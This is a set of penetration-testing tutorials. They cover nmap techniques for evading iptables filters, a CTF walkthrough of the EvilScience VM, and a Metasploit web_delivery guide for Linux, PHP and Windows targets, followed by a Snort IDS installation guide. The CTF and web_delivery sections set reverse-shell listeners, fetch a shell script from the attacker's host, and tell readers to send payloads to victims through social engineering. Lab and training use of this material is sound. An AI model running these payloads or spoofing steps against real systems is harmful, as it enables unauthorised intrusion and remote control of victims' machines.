Understanding Guide to Nmap Firewall Scan (Part 2)

In our pervious article we had demonstrated “Nmap firewall scan (part 1)” by making use of Iptable rules and then try to bypass firewall filter to perform NMAP Advance scanning, today we are going to discuss second part of it.  

Requirement

Attacker: Kali Linux

Target: Ubuntu  

Allow TCP Packet from Specific Mac Address

If network admin wants to establish TCP connect from specific MAC address and do not want to connect with other system then he could use following Iptable rules to apply firewall filter in his network.  

iptables -I INPUT -p tcp -m mac --source-mac "AA:AA:AA:AA:AA:AA" -j ACCEPT

iptables -I INPUT -p tcp -j REJECT --reject-with tcp-reset

Now when attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system. 

nmap 192.168.1.117

Spoof MAC Address and Bypass firewall

In order to bypass above applied filter attacker may run netdiscover command or nmap Host Scan in Kali Linux terminal to identify the active host in the network. As result he will get a table which contains MAC address and IP address of active host in local network.

Now either use one by one all MAC address in nmap command or save all MAC address in a text file and give its path in nmap command but to perform this attacker first need to enable “Promiscuous mode” of his network. Well, to do so type given below commands first for Promiscuous mode and second for nmap scanning.

ip link set eth0 promisc on

nmap –spoof-mac AA:AA:AA:AA:AA:AA 192.168.1.117

Hence if you are lucky to spoof correct Mac address then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Nice!!! If you will notice in given below image you will observe open ports of target’s network.

Allow TCP Packet from Specific IP

If network admin wants to establish TCP connect from specific IP and do not want to connect with other system then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -j REJECT --reject-with tcp-reset

iptables -I INPUT -p tcp -s 192.168.1.120 -j ACCEPT

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system.

nmap 192.168.1.117

Spoof IP Address and Bypass firewall

In order to bypass above applied filter attacker may again run netdiscover command or nmap Host Scan in Kali Linux terminal to identify the active host in the network. As result he will get a table which contains MAC address and IP address of active host in local network.

Now either use one by one all IP address in nmap command or save all IP address in a text file and give its path in nmap command and then execute following command:

nmap -e eth0 -S 192.168.1.120 192.168.1.117

Hence if you are lucky to spoof correct IP address then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Great!! If you will notice in given below image you will observe open ports of target’s network.

Allow TCP Packet from Specific String

If network admin wants to establish TCP connect from a system which contain specific string and do not want to connect with other system does not contain that special string packets then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -m string --algo bm --string "Khulja sim sim" -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

In above rule you can see we had used "Khulja sim sim" as special string to establish TCP connection. Hence only those TCP connection could be establish which contain "Khulja sim sim"in packets.

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system because traffic generate from his network does not contain special string in packets thus firewall of target system will discard all TCP packet of attacker’s network.

nmap 192.168.1.117

Use NMAP Data-String and Bypass firewall

If attacker somehow sniffs special string “khulja sim sim” to connect with target’s network then he could use –data-string argument in nmap command to bypass the firewall.

nmap --data-string "Khulja sim sim" 192.168.1.117

Hence if you are lucky to sniff correct data string then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Wonderful!! If you will notice given below image you will observe open ports of target’s network.

Allow TCP Packet from Specific Hex String

If network admin wants to establish TCP connect from a system which contain hexadecimal value of particular string and do not want to connect with other system does not contain hexadecimal value of that special string in packets then he could use following Iptable rules to apply firewall filter in his network. 

iptables -I INPUT -p tcp -m string --algo kmp --hex-string "RAJ" -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

In above rule you can see we had used hex value for "RAJ" as special string to establish TCP connection. Hence only those TCP connection could be established which contain hex value of "RAJ" in packet.

Now when again attacker will perform basic network scanning on target’s network, he could not able to enumerate ports and running service of victim’s system because traffic generate from his network does not contain hex value of special string in packets thus firewall of target system will discard all TCP packet of attacker’s network.

nmap 192.168.1.117

Use NMAP Data-String and Bypass firewall

If attacker somehow sniffs special string “RAJ” to connect with target’s network then he could used its hex values with --data argument in nmap command to bypass the firewall.

nmap --data "\x52\x41\x4a" 192.168.1.117

Hence if you are lucky to sniff correct hex value of particular data string then you can easily bypass the firewall filter and able to establish TCP connect with victim’s network for port enumeration.

Hence, if you will notice given below image you will observe open ports of target’s network.

Reject TCP Packets contains tcp-option

By default nmap sends 24 bytes of TCP data in which 4 bytes of data is reserve for TCP Options if network admin reject 4 bytes tcp –option packet to discord tcp connection to prevent his network from scanning. Type following iptable rule to reject 4 bit tcp-option in his network:

iptables -A INPUT -p tcp –tcp-option 4  -j REJECT --reject-with tcp-reset

Now when attacker will perform TCP scanning [sT] on target’s network, he could not able to enumerate ports and running service of victim’s system. Since tcp-option is 4 bytes hence firewall discard tcp packet of attacker’s network.

nmap -sT 192.168.1.117

Use NMAP ip-option to Bypass TCP-Option Filter

The IP protocol gives numerous options that could be placed in packet headers. Contrasting the omnipresent TCP options, IP options are seldom observed because of security reasons. The most powerful way to specify IP options is to simply pass in hexadecimal data as the argument to --ip-options.

Precede every hex byte value with \x. You may repeat certain characters by following them with an asterisk and then the number of times you wish them to repeat. For example, \x01\x07\x04\x00*4 is the same as\x01\x07\x04\x00\x00\x00\x00 this is also called NuLL bytes

Now type following command with ip-option argument as shown below:

nmap –ip-option “\x00\x00\x00\x00\x00*” 192.168.1.117

Note that if you denote a number of bytes that is not a multiple of four; an incorrect IP header length will be set in the IP packet. The reason for this is that the IP header length field can only express multiples of four. In those cases, the length is computed by dividing the header length by 4 and rounding down. 

GOOD! If you will notice given below image you will observe open ports of target’s network.

https://nmap.org/book/nping-man-ip-options.html

Hack The Ether: EvilScience VM (CTF challenge)

Hello friends! Today we are going to take another CTF challenge known as The Ether: EvilScience. The credit for making this vm machine goes to “f1re_w1re” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.146 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.146

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We find that the site is vulnerable to LFI. Going through the pages we find that the index.php file is vulnerable to LFI

We can access auth.log with LFI. We use burpsuite to check the response and we find that we can use ssh log poisoning to get access to server.

We now login with username as basic php shell.

ssh ‘’@192.168.1.146

Now we check if log injection is possible we try to run ‘ls’ command and find that log injection is possible.

We use web_delivery script in metasploit to gain reverse shell.

msf > use multi/script/web_delivery

msf exploit(web_delivery) > set target 1

msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(web_delivery) > set lhost 192.168.1.131

msf exploit(web_delivery) > set lport 4444

msf exploit(web_delivery) > run

Now we run python to run our script to bypass the firewall.

As soon as we get send the request we get the revershell.

Now we spawn tty shell with python.

python -c ‘import pty; pty.spawn(“/bin/bash”);’

Now we take look at the sudoers file. We find that we don’t need need password to run a python file as root.

Now we run the file as root. When we run the file we find that it opens log file so we use pipe to run our commands. We run id command and find that we can execute commands as root.

Now we setup our listener using netcat.

nc -lvp 5555

Now we create a python shell and save it into our /var/www/html folder.

We download it inside /tmp folder on the target VM using wget.

wget http://192.168.1.108/shell.py -O /tmp/shell.py

Let’s run the shell using python shell.

Now as soon as we run the shell we get the reverse shell. We run the id command to check the user. We move to the root directory and find an image file called flag.png

We check the strings inside the image using tail command.

tail flag.png

Inside the image file we find a flag in base64 encode.

We decode the base64 encoded string.

echo ‘base64-encoded-string’ | base64 -d

Command Injection Exploitation using Web Delivery (Linux, Windows)

Hello friends! In this article you will learn how to exploit three different platform [Linux, windows, using single exploit of metasploit framework.

Requirement

Attacker:Kali Linux

Targeted platform: Window,PHP,Linux[ubuntu]

Open the terminal in your kali Linux and type “msfconsole” to load metasploit framework and execute given below exploit.

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>show targets

From given below image you can observe that there are 5 targets, which help you in generating malicious code to create backdoor in victim system.

Exploit Linux platform [python]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of Kali Linux)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 0

msf exploit (web_delivery)>set payload python/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 0 to generate malicious code for python platform, from given below image you can observe the highlighted malicious python code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in terminal, attacker will obtain meterpreter session as unauthorized access of victim system.

Exploit Web Server platform [PHP]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132 (IP of kali Linux)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

Now we had set target 1 to generate malicious code for php platform, from given below image you can observe the highlighted malicious php code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in web browser, attacker will obtain another meterpreter session as unauthorized access of victim system.

Exploit Windows platform [exe]

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

Further we had set target 2 to generate malicious code for window platform, from given below image you can observe the highlighted malicious powershell.exe, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in command prompt, attacker will obtain meterpreter session as unauthorized access of victim system.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 3

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 3 to generate malicious code for window platform, from given below image you can observe the highlighted malicious dll code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code as run command inside RUN window, attacker will again obtain meterpreter session, and make an unauthorized access in victim system.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.132

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 4

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>run

In this exploit we had set target 4 to generate malicious code for windows platform, from given below image you can observe the highlighted malicious powershell.exe binary code, now copy it and send to victim using social engineering method.

As soon as victim will execute the malicious code in command prompt, attacker will obtain meterpreter session as unauthorized access of victim system.

Hence a single exploit “web delivery script” is quite helpful to hack three different platforms.

IDS, IPS Penetration Testing Lab Setup with Snort

Hello friends! As you people must be aware of various types of security issues facing by IT sector originations daily. There are so many types of firewall and IDS or third party software available to shoot out major different types of security issues in the network.

In this article you will learn how to configure the famous “SNORT as IDS” of IT sector originations which work as real-time machine.

Snort is software created by Martin Roesch, which is widely use as Intrusion Prevention System [IPS] and Intrusion Detection System [IDS] in network. It is separated into the five most important mechanisms for instance: Detection engine, Logging and alerting system, Packet decoder, Preprocessor and Output modules.

The program is quite famous to carry out real-time traffic analysis, also used to detect query or attacks, packet logging on Internet Protocol networks, to detect malicious activity, denial of service attacks and port scans by monitoring network traffic, buffer overflows, server message block probes, and stealth port scans.

Snort can be configured in three main modes:

·          Sniffer mode: it will observe network packets and present them on the console.

·         Packet logger mode: it will record packets to the disk.

·         Intrusion detection mode: the program will monitor network traffic and analyze it against a rule set defined by the user.

After that the application will execute a precise action depend upon what has been identified.

Let’s Begin!!

Snort Installation

We had chosen ubuntu 14.04 operating system for installation and configuration of snort. Earlier than installing snort in your machine, you should need to install necessary dependencies of ubuntu. Therefore open the terminal and type given below command to install pre-requisites:

sudo apt-get install -y build-essential libpcap-dev libpcre3-dev libdumbnet-dev bison flex zlib1g-dev

Now create a folder to download snort and its dependencies package inside. Type given below commands to create a folder “snort-src” and move inside it to download DAQ-2.0.6

mkdir ~/snort_src && cd ~/snort_src

wget https://snort.org/downloads/snort/daq-2.0.6.tar.gz

Snort need to set up the DAQ, or Data Acquisition library, for packet I/O.  The DAQ change direct calls into lib pcap functions with an abstraction layer that facilitates operation on a variety of hardware and software interfaces without requiring changes to Snort.  It is possible to select the DAQ type and mode when invoking Snort to perform pcap read back or inline operation, etc.  The DAQ library may be useful for other packet processing applications and the modular nature allows you to build new modules for other platforms.

From given below image you can confirm that we had successfully downloaded daq-2.0.6 tar file.

Now execute given below command to extract tar file.

tar xvfz daq-2.0.6.tar.gz

Move inside daq-2.0.6 folder by executing given below first command and then execute second command for automatically installation and configuration.

cd daq-2.0.6

./configure && make && sudo make install

Till here you had learn how install daq-2.0.6 for snort.

Now again move into snort-src folder and type given below command to download latest version of snort-2.9.11

wget https://snort.org/downloads/snort/snort-2.9.11.tar.gz

From given below image you can confirm that we had successfully downloaded snort-2.9.11 tar file.

Now execute given below command to extract tar file.

tar xvfz snort-2.9.11.tar.gz

Move inside snort-2.9.11 folder by executing given below first command and then execute second command for automatically installation and configuration.

cd snort-2.9.11

./configure --enable-sourcefire && make && sudo make install

Run following command to manage and install shared libraries

sudo ldconfig

Type given below command for generating symbolic link

sudo ln -s /usr/local/bin/snort /usr/sbin/snort

A symbolic link also known as soft link is a file system entry that points to the file name and location. Deleting the symbolic link does not remove the original file. If, on the other hand, the file to which the soft link point is removed, the soft link stops working, it is broken.

Now execute given below command that snort to verify itself by testing its installation and configuration.

snort –V

The first part of snort installation finished here

Configure Snort to in IDS Mode in Network

Execute given below command to create the snort user and group, where snort will run as an unprivileged user.

sudo groupadd snort

sudo useradd snort -r -s /sbin/nologin -c SNORT_IDS -g snort

Above command will create a group as “snort” and add a member “snort” into it.

Now further we need to make some directories which Snort suppose at the timing of running in IDS mode in network. Snort stores configuration files in /etc/snort; rules in /etc/snort/rules; store compile rules in  /usr/local/lib/snort_dynamicrules, and stores its logs in /var/log/snort:

Type given below command to create the Snort directories:

sudo mkdir /etc/snort

sudo mkdir /etc/snort/rules

sudo mkdir /etc/snort/rules/iplists

sudo mkdir /etc/snort/preproc_rules

sudo mkdir /usr/local/lib/snort_dynamicrules

sudo mkdir /etc/snort/so_rules    

Type given below command to create some files that stores rules and ip lists

sudo touch /etc/snort/rules/iplists/black_list.rules

sudo touch /etc/snort/rules/iplists/white_list.rules

sudo touch /etc/snort/rules/local.rules

sudo touch /etc/snort/sid-msg.map

Type given below command to create our logging directories:

sudo mkdir /var/log/snort

sudo mkdir /var/log/snort/archived_logs

Type given below command to adjust permissions:

sudo chmod -R 5775 /etc/snort

sudo chmod -R 5775 /var/log/snort

sudo chmod -R 5775 /var/log/snort/archived_logs

sudo chmod -R 5775 /etc/snort/so_rules

sudo chmod -R 5775 /usr/local/lib/snort_dynamicrules

Snort required some configuration files and the dynamic preprocessors to be copied from the Snort source folder into the /etc/snort folder therefore execute given below command for that.

cd snort_src/snort-2.9.11/etc/

sudo cp *.conf* /etc/snort

 sudo cp *.map /etc/snort

 sudo cp *.dtd /etc/snort

cd snort_src/snort-2.9.11/src/dynamic-preprocessors/build/usr/local/lib/snort_dynamicpreprocessor/

sudo cp * /usr/local/lib/snort_dynamicpreprocessor/

Editing snort configuration file

Now we need to comment out all rulesets with the following command:

sudo sed -i "s/include \$RULE\_PATH/#include \$RULE\_PATH/" /etc/snort/snort.conf

After then open the configuration file using gedit for making some changes inside.

sudo gedit /etc/snort/snort.conf

Scroll down the text file near line number 45 to specify your network for protection as shown in given image.

#Setup the network addresses you are protecting

 ipvar HOME_NET 192.168.1.1/24  

Now again scroll down near line number 108 to set the path of your rule file which you had created above for storing snort rules, as shown in given below image.

var RULE_PATH /etc/snort/rules

var SO_RULE_PATH /etc/snort/so_rules

var PREPROC_RULE_PATH /etc/snort/preproc_rules

var WHITE_LIST_PATH /etc/snort/rules/iplists

var BLACK_LIST_PATH /etc/snort/rules/iplists

One more time scroll down the text near line number 546 to uncomment highlighted text.

include $RULE_PATH/local.rules   

Save the file and close it once all the editing is done in snort configuration file. 

Now once again we need to verify its configuration setting therefore execute following command to test it.

sudo snort -T -i eth0 -c /etc/snort/snort.conf

Now it will compile the complete file and test the configuration setting automatically as shown in given below image:

Great!! We had successfully configured snort as IDS for protecting our network.